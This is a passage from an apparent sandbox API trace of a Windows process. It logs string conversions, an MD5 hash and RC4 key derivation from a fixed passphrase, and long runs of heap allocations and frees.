lpMultiByteStr=0x43ca5e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0087.037] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0087.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0087.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0087.038] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0087.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0087.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0087.038] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.038] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0087.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca538, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0087.038] CryptHashData (hHash=0x41ac600, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0087.038] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.038] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0087.038] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0087.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca490, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0087.038] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac600, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac180) returned 1 [0087.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0087.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0087.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0087.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0087.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0087.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0087.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0087.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0087.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0087.039] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0087.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7f0 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa60 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7d8 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca790 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca898 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8e0 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca958 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0087.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0087.041] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0087.041] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0087.041] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0087.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0087.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0087.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0087.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0087.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796d68 [0087.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796d68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0087.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0087.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0087.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0087.042] CryptDestroyHash (hHash=0x41ac600) returned 1 [0087.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0087.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0087.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0087.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0087.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0087.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0087.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0087.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0087.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0087.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0087.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0087.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0087.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0087.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0087.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0087.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0087.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0087.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0087.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0087.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0087.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0087.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0087.044] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0087.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0087.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0087.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0087.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0087.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0087.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0087.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0087.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0087.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0087.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 